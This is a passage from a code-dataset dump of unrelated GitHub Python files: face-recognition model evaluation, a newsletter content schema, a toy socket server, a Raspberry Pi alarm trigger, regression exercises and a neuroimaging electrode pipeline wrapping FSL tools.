random_state=123)\nmodel_dt_reduced.fit(X_train_new, y_train)\n\nreduced_features = [\n \"avg_word_length\",\n \"if_mention_european\",\n \"stopwords_counts\",\n \"tag_X_count\",\n \"web_words_count\",\n]\n\n# Visualize decision tree\nfig, ax = plt.subplots(figsize=(12, 12))\ntree.plot_tree(model_dt_reduced, feature_names=reduced_features, fontsize=10)\nplt.show()\n\n# correlation between features and target\ndf = pd.DataFrame(data=X_train_enc, columns=features)\ncor = df.corr()\nplt.figure(figsize=(15, 15))\nsns.set(font_scale=0.8)\nsns.heatmap(cor, annot=True, cmap=plt.cm.Blues)","repo_name":"Jeremyzzzz/nlp_learner_native_lang_prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"1263128812","text":"import subprocess\nimport os\n\nwhile True:\n exists = os.path.isfile('/home/pi/trigger.txt')\n\n if exists:\n print(\"caught\")\n os.system(\"sudo rm trigger.txt\")\n 
subprocess.call([\"/home/pi/.npm-global/bin/particle\", \"call\", \"2e002d000447363333343435\", \"bell\", \"true\"])\n","repo_name":"reidmeyer/222AlarmSystemFinal","sub_path":"hardware/PiFiles/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71509242113","text":"import os\nimport random\nfrom tqdm import tqdm\nimport argparse\n\nimport pandas as pd\nfrom deepface.DeepFace import represent, build_model\nfrom deepface.commons import distance, functions\n\nimport keras.backend as K\n\ncfg = K.tf.compat.v1.ConfigProto()\ncfg.gpu_options.allow_growth = True\nK.set_session(K.tf.compat.v1.Session(config=cfg))\n\nfrom commons import img_name_generator, models\n\nNUM_NEGATIVE_IDENT_ = 6\nNUM_RESULT_DECIMAL_PLACES = 6\n\n\ndef args_input():\n parser = argparse.ArgumentParser(description=\"Prepare img db from CelebA dataset\")\n parser.add_argument(\n \"-n\",\n \"--num_identities_to_test\",\n default=1000,\n help=\"Specify number identities in db to test\",\n )\n parser.add_argument(\n \"-m\",\n \"--model_name\",\n default=\"VGG-Face\",\n help=\"\"\"Select one of recognition models: \n VGG-Face, OpenFace, Facenet, Facenet512, DeepFace, DeepID, Dlib, ArcFace, SFace\"\"\",\n )\n parser.add_argument(\n \"-f\",\n \"--test_db_dir\",\n default=\"db-imgs\",\n help=\"\"\"Specify path to dir with imgs to test\"\"\",\n )\n parser.add_argument(\n \"-c\",\n \"--num_clean\",\n default=51,\n help=\"\"\"Specify num iterations to clear sesion\"\"\",\n )\n return parser.parse_args()\n\n\ndef args_parser(args):\n model_name = args.model_name\n if model_name not in models:\n raise ValueError(\"Incorrect model name\")\n num_ident = int(args.num_identities_to_test)\n if num_ident < 2:\n raise ValueError(\"To small number of img to test\")\n db_test_path = args.test_db_dir\n num_clean = int(args.num_clean)\n return model_name, num_ident, db_test_path, num_clean\n\n\ndef generat_pair():\n l = random.randint(1, num_ident_to_test)\n m = random.randint(4, 9)\n return l, m\n\n\ndef generate_negative_pair(j, k):\n negative_names = []\n while len(negative_names) < NUM_NEGATIVE_IDENT_:\n l, m = generat_pair()\n if j == l:\n continue\n else:\n negative_name = img_name_generator(l, m)\n if negative_name in negative_names:\n continue\n else:\n negative_names.append(negative_name)\n return negative_names\n\ndef negative_pairs_generator(negative_pairs_path):\n negative_pairs = []\n for ident in range(1, num_ident_to_test + 1):\n for i in range(1, 4):\n negative_names = generate_negative_pair(ident, i)\n negative_pairs.append(negative_names)\n df = pd.DataFrame(negative_pairs)\n df.to_csv(negative_pairs_path)\n\nif __name__ == \"__main__\":\n args = args_input()\n selected_model, num_ident_to_test, db_test_path, num_clean = args_parser(args)\n negative_pairs_path = os.path.join(\"CelebA\", \"negative_paris.csv\")\n db_to_test = os.path.join(\"CelebA\", db_test_path)\n db_identity = os.path.join(\"CelebA\", \"db-ident\")\n if db_test_path == \"img_prepared\" or db_test_path == \"db-imgs\":\n noise_and_value = \"\"\n else:\n noise_and_value = db_test_path.replace(\"db-imgs\", \"\")\n\n if not os.path.exists(negative_pairs_path):\n raise FileNotFoundError(\"No negative file\")\n negative_pairs_generator(negative_pairs_path)\n \n negative_paris = pd.read_csv(negative_pairs_path)\n\n positives_distances = []\n negatives_distances = []\n\n model = build_model(selected_model)\n target_size = 
functions.find_target_size(model_name=selected_model)\n\n print(\"-\" * 40)\n print(\"Selected to test: \", noise_and_value)\n\n print(\"Analizing positive pairs\")\n for ident in tqdm(range(1, num_ident_to_test + 1)):\n if ident % num_clean == 0:\n K.clear_session()\n for i in range(1, 4):\n img_obj = functions.extract_faces(\n os.path.join(db_identity, img_name_generator(ident, i)),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding_org = res[0][\"embedding\"]\n for j in range(4, 10):\n img_obj = functions.extract_faces(\n os.path.join(db_to_test, img_name_generator(ident, j)),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding = res[0][\"embedding\"]\n dist_cosine = distance.findCosineDistance(embedding_org, embedding)\n dist = distance.findEuclideanDistance(embedding_org, embedding)\n dist_l2 = distance.findEuclideanDistance(\n distance.l2_normalize(embedding_org),\n distance.l2_normalize(embedding),\n )\n\n dist_cosine_rounded = round(dist_cosine, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded = round(dist, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded_l2 = round(dist_l2, NUM_RESULT_DECIMAL_PLACES)\n positives_distances.append(\n [dist_cosine_rounded, dist_rounded, dist_rounded_l2]\n )\n\n pos_dist = pd.DataFrame(\n positives_distances, columns=[\"distance_cos\", \"distance_euc\", \"distance\"]\n )\n pos_dist[\"decision\"] = \"Yes\"\n\n print(\"Analizing negative pairs\")\n for ident in tqdm(range(1, num_ident_to_test + 1)):\n if ident % num_clean == 0:\n K.clear_session()\n for i in range(1, 4):\n img_obj = functions.extract_faces(\n os.path.join(db_identity, img_name_generator(ident, i)),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding_org = res[0][\"embedding\"]\n idx = (ident - 1) * 3 + (i - 1)\n for j in negative_paris.iloc[idx].to_list()[1:]:\n img_obj = functions.extract_faces(\n os.path.join(db_to_test, j),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding = res[0][\"embedding\"]\n dist_cosine = distance.findCosineDistance(embedding_org, embedding)\n dist = distance.findEuclideanDistance(embedding_org, embedding)\n dist_l2 = distance.findEuclideanDistance(\n distance.l2_normalize(embedding_org),\n distance.l2_normalize(embedding),\n )\n\n dist_cosine_rounded = round(dist_cosine, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded = round(dist, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded_l2 = round(dist_l2, NUM_RESULT_DECIMAL_PLACES)\n negatives_distances.append(\n [dist_cosine_rounded, dist_rounded, dist_rounded_l2]\n )\n\n neg_dist = pd.DataFrame(\n negatives_distances, columns=[\"distance_cos\", \"distance_euc\", \"distance\"]\n )\n neg_dist[\"decision\"] = \"No\"\n\n df = pd.concat([pos_dist, neg_dist]).reset_index(drop=True)\n\n result_file_name = \"result_\" + selected_model + noise_and_value + \".csv\"\n if not os.path.exists(\"results\"):\n os.makedirs(\"results\")\n result_file_name = os.path.join(\"results\", result_file_name)\n df.to_csv(result_file_name)\n print(\"TEST END\\nFile with results 
saved\")","repo_name":"wojter/master-thesis","sub_path":"facelytics/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27540431407","text":"import socket\n\nHOSTNAME=socket.gethostname()\nPORT=6969\n\ns=socket.socket()\ns.bind((HOSTNAME, PORT))\ns.listen(5)\n\nprint('Started server at %s:%d'%(HOSTNAME,PORT))\n\nwhile 1:\n con, addr=s.accept()\n message=con.recv(1024)\n print('Received message from address %s'%str(addr))\n print('Message: %s'%str(message))\n con.send(b'Thank you for using the testserrver application!')\n con.close()\n print('Connection closed with %s'%str(addr))\n print()\n","repo_name":"plasmatic1/archived-projects","sub_path":"Other Python/testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31045813455","text":"import pandas as pd\nimport re\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nX = []\nY = []\ncsv = '/Users/shiran/workspace/datasets/tmdb_5000_movies.csv'\nfor line in open(csv):\n x1, x2, y = line.split(',')\n X.append([1.0, float(x1), float(x2)]) # add the bias term\n Y.append(float(y))\n\n\n# let's turn X and Y into numpy arrays since that will be useful later\nX = np.array(X)\nY = np.array(Y)\n\nw = np.linalg.solve(np.dot(X.transpose(), X), np.dot(X.transpose(), Y))\n\nyHat = np.dot(X, w)\n\nd1 = Y - yHat\nd2 = Y - Y.mean()\nr2 = 1 - d1.dot(d1) / d2.dot(d2)\n\nprint(r2)\n##### plot\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(X[:, 0], X[:, 1], Y)\nplt.show()\n\n\n\n#\n#\n# # let's plot the data to see what it looks like\n# fig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n#\n# d = pd.read_csv(csv, header=None)\n# arr = d.as_matrix()\n# X_2 = d[[0, 1]].as_matrix()\n# Y_2 = d[[2]].as_matrix()\n#\n# print(X.shape)\n# print(X_2.shape)\n","repo_name":"shirans/classes","sub_path":"lazy_prog/1_linear_regression_lazy_prog/multidim/linear2d_imdb.py","file_name":"linear2d_imdb.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44249100101","text":"# -*- coding: utf-8 -*-\n# from z3c.form.browser.radio import RadioFieldWidget\nfrom plone import api\nfrom plone import schema\nfrom plone.app import textfield\nfrom plone.app.z3cform.widget import SingleCheckBoxBoolFieldWidget\nfrom plone.autoform import directives\nfrom plone.dexterity.content import Container\nfrom plone.namedfile import field as namedfile\nfrom plone.registry.interfaces import IRegistry\nfrom plone.supermodel import model\nfrom Products.EasyNewsletter import _\nfrom Products.EasyNewsletter import config\nfrom z3c import relationfield\nfrom zope.component import getUtility\nfrom zope.interface import implementer\n\n\ndef get_default_output_template():\n registry = getUtility(IRegistry)\n templates_keys = list(registry.get(\"Products.EasyNewsletter.output_templates\"))\n if not templates_keys:\n return\n if \"output_default\" not in templates_keys:\n default_tmpl_key = \"output_default\"\n else:\n default_tmpl_key = templates_keys[0]\n return default_tmpl_key\n\n\ndef _get_base_path(path):\n base_obj = api.content.get(path)\n if not base_obj:\n return\n base_path = \"/\".join(base_obj.getPhysicalPath())\n 
return base_path\n\n\ndef get_content_aggregation_sources_base_path(context):\n return _get_base_path(\"/\")\n\n\nclass INewsletter(model.Schema):\n \"\"\"Marker interface and Dexterity Python Schema for Newsletter\"\"\"\n\n # model.fieldset(\n # 'default',\n # label=u'Default',\n # fields=[\n # 'sender_email',\n # 'sender_name',\n # 'test_email',\n # 'content_aggregation_sources',\n # 'output_template',\n # ],\n # )\n\n model.fieldset(\n \"personalization\",\n label=_(\"Personalization\"),\n fields=[\n \"salutations\",\n \"fullname_fallback\",\n \"unsubscribe_string\",\n \"subscriber_confirmation_mail_subject\",\n \"subscriber_confirmation_mail_text\",\n \"default_prologue\",\n \"default_epilogue\",\n \"banner\",\n \"logo\",\n ],\n )\n\n model.fieldset(\n \"recipients\", label=_(\"Recipients\"), fields=[\"exclude_all_subscribers\"]\n )\n\n sender_email = schema.TextLine(\n title=_(\"ENL_label_senderEmail\", default=\"Sender email\"),\n description=_(\n \"ENL_help_senderEmail\",\n default=\"Default for the sender address of the newsletters.\",\n ),\n required=True,\n )\n\n sender_name = schema.TextLine(\n title=_(\"ENL_label_senderName\", default=\"Sender name\"),\n description=_(\n \"ENL_help_senderName\",\n default=\"Default for the sender name of the newsletters.\",\n ),\n required=True,\n )\n\n test_email = schema.TextLine(\n title=_(\"ENL_label_testEmail\", default=\"Test email\"),\n description=_(\n \"ENL_help_testEmail\", default=\"Default for the test email address.\"\n ),\n required=True,\n )\n\n directives.widget(\n \"content_aggregation_sources\",\n pattern_options={\n \"basePath\": get_content_aggregation_sources_base_path,\n \"selectableTypes\": [\"Collection\"],\n },\n )\n content_aggregation_sources = relationfield.schema.RelationList(\n title=_(\n \"ENL_content_aggregation_sources_label\",\n default=\"Content aggregation sources\",\n ),\n description=_(\n \"ENL_content_aggregation_sources_desc\",\n default=\"Choose sources to aggregate newsletter content from.\",\n ),\n value_type=relationfield.schema.RelationChoice(\n title=\"content_aggretation_source\",\n vocabulary=\"plone.app.vocabularies.Catalog\",\n ),\n required=False,\n )\n\n salutations = schema.List(\n title=_(\"ENL_label_salutations\", default=\"Subscriber Salutations.\"),\n description=_(\n \"ENL_help_salutations\",\n default='Define here possible salutations for subscriber. \\\n One salutation per line in the form of: \"mr|Dear Mr.\". 
\\n                The left hand value \"mr\" or \"ms\" is mapped to salutation \\\n                of each subscriber and then the right hand value, which \\\n                you can customize is used as salutation.',\n        ),\n        default=[\"mr|Dear Mr.\", \"ms|Dear Ms.\", \"default|Dear\"],\n        value_type=schema.TextLine(title=\"salutation\"),\n        required=True,\n    )\n\n    fullname_fallback = schema.TextLine(\n        title=_(\n            \"ENL_label_fullname_fallback\",\n            default=\"Fallback for subscribers without a name.\",\n        ),\n        description=_(\n            \"ENL_help_fullname_fallback\",\n            default=\"This will be used if the subscriber has no fullname.\",\n        ),\n        default=\"Sir or Madam\",\n        required=True,\n    )\n\n    unsubscribe_string = schema.TextLine(\n        title=_(\n            \"ENL_label_unsubscribe_string\", default=\"Text for the 'unsubscribe' link\"\n        ),\n        description=_(\n            \"ENL_help_unsubscribe_string\",\n            default=\"This will replace the placeholder {{UNSUBSCRIBE}}.\",\n        ),\n        default=\"Click here to unsubscribe\",\n        required=True,\n    )\n\n    # Make sure you import: plone.namedfile\n    banner = namedfile.NamedBlobImage(\n        title=_(\"ENL_image_label\", default=\"Banner image\"),\n        description=_(\n            \"ENL_image_desc\",\n            default=\"Banner image, you can include in the templates by\"\n            + \"\\n adding the {{banner}} placeholder into it.\"\n            + \" By default it should be 600x200 pixel.\",\n        ),\n        required=False,\n    )\n\n    # Make sure you import: plone.namedfile\n    logo = namedfile.NamedBlobImage(\n        title=_(\"ENL_logo_label\", default=\"Logo image\"),\n        description=_(\n            \"ENL_logo_desc\",\n            default=\"Logo image, you can include in the templates by\\n\"\n            + \" adding the {{logo}} placeholder into it.\",\n        ),\n        required=False,\n    )\n\n    # Make sure to import: plone.app.textfield\n    default_prologue = textfield.RichText(\n        title=_(\"ENL_label_default_header\", default=\"Prologue\"),\n        description=_(\n            \"ENL_description_text_header\",\n            default=\"The default prologue text. This is used as a default \\\n                for new issues. You can use placeholders like\\\n                {{subscriber_salutation}} and {{unsubscribe}} here.\",\n        ),\n        default=_(\"{{subscriber_salutation}}\"),\n        required=False,\n    )\n\n    # Make sure to import: plone.app.textfield\n    default_epilogue = textfield.RichText(\n        title=_(\"ENL_label_default_footer\", default=\"Epilogue\"),\n        description=_(\n            \"ENL_description_text_footer\",\n            default=\"The default epilogue text. This is used as a default \\\n                for new issues. You can use placeholders like\\\n                {{subscriber_salutation}} and {{unsubscribe}} here.\",\n        ),\n        default=_(\"Community Newsletter for Plone
\\n{{unsubscribe}}\"),\n required=False,\n )\n\n # Make sure you import:\n # plone.app.z3cform.widget.SingleCheckBoxBoolFieldWidget\n directives.widget(exclude_all_subscribers=SingleCheckBoxBoolFieldWidget)\n exclude_all_subscribers = schema.Bool(\n title=_(\"ENL_label_excludeAllSubscribers\", default=\"Exclude all subscribers\"),\n description=_(\n \"ENL_help_excludeAllSubscribers\",\n default=\"If checked, the newsletter/mailing will not be send \\\n to all subscribers inside the newsletter. Changing this \\\n setting does not affect already existing issues.\",\n ),\n required=False,\n default=False,\n )\n\n output_template = schema.Choice(\n title=_(\"enl_label_output_template\", default=\"Output template\"),\n description=_(\n \"enl_help_output_template\",\n default=\"Choose the template to render the email. \",\n ),\n vocabulary=\"Products.EasyNewsletter.OutputTemplates\",\n defaultFactory=get_default_output_template,\n required=True,\n )\n\n subscriber_confirmation_mail_subject = schema.TextLine(\n title=_(\n \"ENL_label_subscriber_confirmation_mail_subject\",\n default=\"Subscriber confirmation mail subject\",\n ),\n description=_(\n \"ENL_description_subscriber_confirmation_mail_subject\",\n default=\"Text used for confirmation email subject. You can \\\n customize the text, but it should include the \\\n placeholder: ${portal_url}!\",\n ),\n default=config.DEFAULT_SUBSCRIBER_CONFIRMATION_MAIL_SUBJECT,\n required=True,\n )\n\n subscriber_confirmation_mail_text = schema.Text(\n title=_(\n \"ENL_label_subscriber_confirmation_mail_text\",\n default=\"Subscriber confirmation mail text\",\n ),\n description=_(\n \"ENL_description_subscriber_confirmation_mail_text\",\n default=\"Text used for confirmation email. You can customize \\\n the text, but it should include the placeholders: \\\n ${portal_url}, ${subscriber_email} and \\\n ${confirmation_url}!\",\n ),\n default=config.DEFAULT_SUBSCRIBER_CONFIRMATION_MAIL_TEXT,\n required=True,\n )\n\n directives.order_after(content_aggregation_sources=\"IBasic.title\")\n directives.order_after(test_email=\"IBasic.title\")\n directives.order_after(sender_name=\"IBasic.title\")\n directives.order_after(sender_email=\"IBasic.title\")\n directives.order_after(output_template=\"IRichText.text\")\n\n\n@implementer(INewsletter)\nclass Newsletter(Container):\n \"\"\" \"\"\"\n\n def get_newsletter(self):\n return self\n\n # bbb to support ATCT way, needs to be removed in v5.x:\n getNewsletter = get_newsletter\n","repo_name":"collective/Products.EasyNewsletter","sub_path":"src/Products/EasyNewsletter/content/newsletter.py","file_name":"newsletter.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"26629237011","text":"from setuptools import find_packages, setup\n\nsetup_requires = []\n\ninstall_requires = [\n \"natsort\",\n \"numpy\",\n \"psutil\",\n \"scikit-learn\",\n \"torch\",\n \"torchvision\",\n \"tqdm\",\n \"matplotlib\",\n \"albumentations\",\n 'opencv-python-headless<4.3.0;python_version<\"3.7\"', # because it takes too long to build\n 'opencv-python-headless;python_version>=\"3.8\"',\n 'imageio==2.15.0;python_version<\"3.7\"', # dependency of moviepy\n \"moviepy\",\n \"PyYAML>=5.1\",\n \"types-PyYAML\",\n \"gdown\",\n]\n\nextra_all_requires = [\"pybullet\", \"tinyfk<0.6\"]\n\nsetup(\n name=\"mohou\",\n version=\"0.5.9\",\n description=\"Visuomotor imitation learning framework\",\n author=\"Hirokazu Ishida\",\n 
author_email=\"h-ishida@jsk.imi.i.u-tokyo.ac.jp\",\n url=\"https://github.com/HiroIshida/mohou\",\n long_description=open(\"README.md\").read(),\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Natural Language :: English\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.8\",\n ],\n install_requires=install_requires,\n extras_require={\"all\": extra_all_requires},\n packages=find_packages(exclude=(\"tests\", \"docs\")),\n package_data={\"mohou\": [\"py.typed\"]},\n)\n","repo_name":"HiroIshida/mohou","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"5074312742","text":"import configjson as config\nimport math\n\n\ndef clamp(minimum, x, maximum):\n return max(minimum, min(x, maximum))\n\n\nclass User:\n def __init__(self, pos, camera, geom):\n self.pos = pos\n self.look_at = [0.5, 0.11, 0.5]\n self.camera = camera\n self.mouse_position = [config.window_info.window_size[0] / 2, config.window_info.window_size[1] / 2]\n self.geom_ref = geom\n self.vertical_speed = 0\n self.look_angle = 0\n\n def update_camera(self):\n self.camera.pos = [self.pos[0], self.pos[1] + 3.375, self.pos[2]]\n factor = 2 * math.pi / config.window_info.window_size[0]\n angle = self.mouse_position[0] * factor\n self.look_angle = angle\n\n yfactor = 6.0 / config.window_info.window_size[1]\n val = -((self.mouse_position[1] * yfactor) - 3)\n\n self.camera.look_direction = [math.sin(angle), val, math.cos(angle)]\n\n def mouse_delta(self, dx, dy):\n self.mouse_position[0] += dx * (config.mouse_sensitivity / 3)\n self.mouse_position[1] += dy * (config.mouse_sensitivity / 3)\n self.mouse_position[0] %= config.window_info.window_size[0]\n self.mouse_position[1] = clamp(0, self.mouse_position[1], config.window_info.window_size[1])\n\n def physics_tick(self, dx, dz):\n self.vertical_speed -= config.gravity\n self.vertical_speed = max(config.terminal_velocity, self.vertical_speed)\n px, py, pz = self.pos[0] + dx, self.pos[1], self.pos[2] + dz\n for i in self.geom_ref.geoms:\n px, py, pz = i.pushcube.check_and_modify(px, py, pz)\n self.pos = [px, py, pz]\n px, py, pz = self.pos[0], self.pos[1] + self.vertical_speed, self.pos[2]\n for i in self.geom_ref.geoms:\n px, py, pz = i.pushcube.check_and_modify(px, py, pz)\n self.pos = [px, py, pz]\n for i in self.geom_ref.geoms:\n a = i.pushcube.check_and_modify(px, py + 3.375, pz)\n px = a[0]\n pz = a[2]\n self.pos = [px, py, pz]\n\n if self.pos[1] < -10.0:\n self.pos = [0, 3, 0]\n if self.pos[1] > 250.0:\n self.pos = [0, 3, 0]\n self.vertical_speed /= 2\n\n def walk_forward(self):\n return self.camera.look_direction[0] * config.walking_speed, self.camera.look_direction[\n 2] * config.walking_speed\n\n def angle_offset(self, angle):\n angle = math.radians(angle)\n return math.sin(self.look_angle + angle) * config.walking_speed, math.cos(\n self.look_angle + angle) * config.walking_speed\n\n def jump(self):\n self.vertical_speed += config.jump_speed\n","repo_name":"mincrmatt12/PyCONCa2017","sub_path":"3dLandscapeModel/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14490318804","text":"from werken import tids\nimport 
pytest\n\n\n@pytest.mark.parametrize(\"value, expected\", [\n (0, \"0000000000\"),\n (9, \"0000000009\"),\n (10, \"000000000A\"),\n (36, \"000000000a\"),\n (61, \"000000000z\"),\n (62, \"0000000010\"),\n (tids.MAX_ID, \"zzzzzzzzzz\")])\ndef test_id_from_int(value, expected):\n assert tids.id_from_int(value) == expected\n\n\ndef test_id_from_int_min():\n with pytest.raises(ValueError, match=\"id must not be negative\"):\n tids.id_from_int(-1)\n\n\ndef test_id_from_int_max():\n with pytest.raises(ValueError, match=\"id too large\"):\n tids.id_from_int(tids.MAX_ID + 1)\n","repo_name":"werken-xyz/werken","sub_path":"src/werken/tests/test_tids.py","file_name":"test_tids.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23546437831","text":"def calculate_answer(S, K):\n S_len = len(S)\n flips = 0\n answer = ''\n all_plus = True\n for i in xrange(S_len):\n if S[i] == '-':\n all_plus = False\n if (S_len - i) >= K:\n k_flag = True\n for k in xrange(i, K + i):\n if S[k] == '+':\n k_flag = False\n S[k] = '-'\n else:\n S[k] = '+'\n all_plus = k_flag\n flips += 1\n else:\n answer = 'IMPOSSIBLE'\n break\n if all_plus:\n answer = str(flips)\n else:\n answer = 'IMPOSSIBLE'\n return answer\n\nin_f = 'A-large.in'\nout_f = 'A-large-out.in'\nwith open(in_f, 'r') as in_file, open(out_f, 'w') as out_file:\n test_cases = int(in_file.readline().strip())\n for t in xrange(1, test_cases + 1):\n s, k = in_file.readline().split(' ')\n S = list(s)\n K = int(k)\n answer = calculate_answer(S, K)\n out_file.write('Case #' + str(t) + ': ' + answer + '\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3440.py","file_name":"3440.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40378830254","text":"#! 
/usr/bin/python3.7\n# -- coding: utf-8 -- **\n\n### Here are a set of functions used in elec_pipe\n### and a set of qthread class for elec_main_gui\n\nimport sys\nimport os\nimport re\nimport math\nimport numpy as np\nfrom numpy import ndarray\nimport nibabel as nib\nfrom scipy import ndimage\nfrom sklearn.mixture import GaussianMixture as GMM\nfrom sklearn.linear_model import LinearRegression, Lasso\nfrom PyQt5.QtCore import QThread, pyqtSignal\n# import matplotlib\n# matplotlib.use(\"Qt5Agg\")\n# from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n# from matplotlib.figure import Figure\n# from matplotlib import pyplot as plt\n# from mpl_toolkits.mplot3d import Axes3D, art3d\n# import electrode\n\nCMD_Hough3D = './hough-3d-lines/hough3dlines'\n\ndef run(cmd):\n \"\"\"\n Print the command.\n Execute a command string on the shell (on bash).\n \n Parameters\n ----------\n cmd : str\n Command to be sent to the shell.\n \"\"\"\n print(f\"Running shell command: {cmd}\")\n os.system(cmd)\n print(f\"Done!\\n\")\n\ndef align(inp, ref, xfm=None, out=None, dof=12, searchrad=True, bins=256, interp=None, cost=\"mutualinfo\", sch=None, wmseg=None, init=None, finesearch=None,):\n \"\"\"Aligns two images using FSLs flirt function and stores the transform between them\n Parameters\n ----------\n inp : str\n path to input image being altered to align with the reference image as a nifti image file\n ref : str\n path to reference image being aligned to as a nifti image file\n xfm : str, optional\n where to save the 4x4 affine matrix containing the transform between two images, by default None\n out : str, optional\n determines whether the image will be automatically aligned and where the resulting image will be saved, by default None\n dof : int, optional\n the number of degrees of free dome of the alignment, by default 12\n searchrad : bool, optional\n whether to use the predefined searchradius parameter (180 degree sweep in x, y, and z), by default True\n bins : int, optional\n number of histogram bins, by default 256\n interp : str, optional\n interpolation method to be used (trilinear,nearestneighbour,sinc,spline), by default None\n cost : str, optional\n cost function to be used in alignment (mutualinfo, corratio, normcorr, normmi, leastsq, labeldiff, or bbr), by default \"mutualinfo\"\n sch : str, optional\n the optional FLIRT schedule, by default None\n wmseg : str, optional\n an optional white-matter segmentation for bbr, by default None\n init : str, optional\n an initial guess of an alignment in the form of the path to a matrix file, by default None\n finesearch : int, optional\n angle in degrees, by default None\n \"\"\"\n\n cmd = f\"flirt -in {inp} -ref {ref}\"\n if xfm is not None:\n cmd += f\" -omat {xfm}\"\n if out is not None:\n cmd += f\" -out {out}\"\n if dof is not None:\n cmd += f\" -dof {dof}\"\n if bins is not None:\n cmd += f\" -bins {bins}\"\n if interp is not None:\n cmd += f\" -interp {interp}\"\n if cost is not None:\n cmd += f\" -cost {cost}\"\n if searchrad is not None:\n cmd += \" -searchrx -180 180 -searchry -180 180 \" + \"-searchrz -180 180\"\n if sch is not None:\n cmd += f\" -schedule {sch}\"\n if wmseg is not None:\n cmd += f\" -wmseg {wmseg}\"\n if init is not None:\n cmd += f\" -init {init}\"\n run(cmd)\n\ndef align_nonlinear(inp, ref, xfm, out, warp, ref_mask=None, in_mask=None, config=None):\n \"\"\"Aligns two images using nonlinear methods and stores the transform between them using fnirt\n Parameters\n ----------\n inp : str\n path to 
the input image\n ref : str\n path to the reference image that the input will be aligned to\n xfm : str\n path to the file containing the affine transform matrix created by align()\n out : str\n path for the desired output image\n warp : str\n the path to store the output file containing the nonlinear warp coefficients/fields\n ref_mask : str, optional\n path to the reference image brain_mask, by default None\n in_mask : str, optional\n path for the file with mask in input image space, by default None\n config : str, optional\n path to the config file specifying command line arguments, by default None\n \"\"\"\n\n cmd = f\"fnirt --in={inp} --ref={ref} --aff={xfm} --iout={out} --cout={warp} --warpres=8,8,8\"\n if ref_mask is not None:\n cmd += f\" --refmask={ref_mask} --applyrefmask=1\"\n if in_mask is not None:\n cmd += f\" --inmask={in_mask} --applyinmask=1\"\n if config is not None:\n cmd += f\" --config={config}\"\n run(cmd)\n\ndef dataExtraction(intraFile, thre=0.2):\n rawData = nib.load(intraFile).get_fdata()\n maxVal = np.amax(rawData)\n # print(f\"maxVal={maxVal}\")\n thre = maxVal * thre\n threData = np.copy(rawData)\n threData[threData < thre] = 0\n xs, ys, zs = np.where(threData != 0)\n return xs, ys, zs\n\ndef trackRecognition(patient, cmd_hough3d, CTresult_dir, intraFile, thre=0.2):\n \n xs, ys, zs = dataExtraction(intraFile, thre)\n \n X = np.transpose(np.array((xs, ys, zs)))\n # print(X.shape)\n # fname = f\"{CTresult_dir}{patient}_3dPointClouds.dat\"\n fname = os.path.join(CTresult_dir, f\"{patient}_3dPointClouds.dat\")\n np.savetxt(fname, X, fmt='%.4f', delimiter=',', newline='\\n', header='point clouds', footer='', comments='# ', encoding=None)\n \n cmd_hough = f\"{cmd_hough3d} -o {CTresult_dir}{patient}.txt -minvotes 5 {fname}\"\n run(cmd=cmd_hough)\n return xs, ys, zs\n\ndef locateLine(row, info):\n ax = info[row][1]\n ay = info[row][2]\n az = info[row][3]\n bx = info[row][4]\n by = info[row][5]\n bz = info[row][6]\n axx = np.linspace(ax, ax+bx*50, 50)\n ayy = np.linspace(ay, ay+by*50, 50)\n azz = np.linspace(az, az+bz*50, 50)\n return axx, ayy, azz\n\nclass Preprocess_thread(QThread):\n\n finished = pyqtSignal()\n\n def __init__(self):\n super(Preprocess_thread, 